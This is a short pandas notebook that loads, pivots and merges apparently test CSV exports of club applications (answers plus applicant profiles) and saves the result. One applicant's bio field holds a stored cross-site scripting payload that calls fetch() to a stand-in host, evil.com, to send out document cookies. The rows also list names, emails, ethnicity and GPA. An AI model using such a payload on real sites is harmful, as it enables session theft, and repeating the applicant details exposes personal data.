In [2]:
import pandas as pd 
import numpy as np

In [3]:
df1 = pd.read_csv('Testing_All-Answers---Valley_2023-12-17_00-14-44.csv')
df2 = pd.read_csv('Testing_Valley-Applications_2023-12-17_00-06-35.csv')

In [4]:
df1.head()

,answer-text,Club,Name,Question,Question-Text,User
0,kjahshfdjkasdf,Valley Consulting Group,Ananth Goyal,1702053500813x661418926316793300,"Q1) What about Blockchain at Berkeley, in spec...",ananthgoyal@gmail.com
1,aksjdhfkajhs jkfhlad,Valley Consulting Group,Ananth Goyal,1702053500813x863156697017231700,"Q1) What about Blockchain at Berkeley, in spec...",ananthgoyal@gmail.com
2,a;skjdlhfl khjkahsdf,Valley Consulting Group,Ananth Goyal,1702053500815x564589527251025000,"Q1) What about Blockchain at Berkeley, in spec...",ananthgoyal@gmail.com
3,askldfjhaslkdhf lkahsdljkfhasdkhhhhhhhhhhhhhhnnn,Valley Consulting Group,Ananth Goyal,1702053500815x726293233349247600,"Q1) What about Blockchain at Berkeley, in spec...",ananthgoyal@gmail.com
4,NaN,Valley Consulting Group,John Doe,1702053500813x661418926316793300,"Q1) What about Blockchain at Berkeley, in spec...",(deleted thing)

In [29]:
df1 = pd.pivot_table(df1, values='answer-text', index='Name', columns='Question', aggfunc='first')

In [30]:
df2["resume"] = df2["resume"].str.slice(start=2)
df2["picture"] = df2["picture"].str.slice(start=2)

In [31]:
df2.head()

,bio,commitments,ethnicity,gpa,is-urm,major,Name,picture,pronouns,relevant-skills,resume,email
0,jhsdfjkhakfhakjshdfkjhajskdf,NaN,Asian,3.8,yes,Engineering Mathematics and Statistics,Ananth Goyal,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,he/him/his,NaN,NaN,ananthgoyal@gmail.com
1,Rushil is a third-year undergraduate student a...,"2 hours- dance club, 2 hours- south indian soc...",Hispanic or Latino,3.6,yes,Scandinavian,Eren Bruce Zulfikar,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,they/them/theirs,"Python, Java, strategy, decking, public speaking",7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,erenzulfikar@berkeley.edu
2,<script> fetch(evil.com/logs/term?=document.co...,NaN,Two or more races,NaN,no,Computer Science,Sasha Lamot,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,NaN,NaN,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,sashalamot@gmail.com
3,Hello I am osiriis,NaN,Black or African American,3.8,yes,EECS & Business Administration,Osiris L,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,he/him/his,NaN,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,osirislamon@gmail.com
4,NaN,NaN,Hispanic or Latino,3.6,yes,Political Economy,Mauricio Chandler,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,NaN,NaN,7ac338911e8382ae861a2f8c881084c5.cdn.bubble.io...,25chandler.mauricio@berkeley.edu

In [32]:
df3 = df2.merge(df1, on="Name").set_index("Name")

In [33]:
df3.to_csv("valley.csv")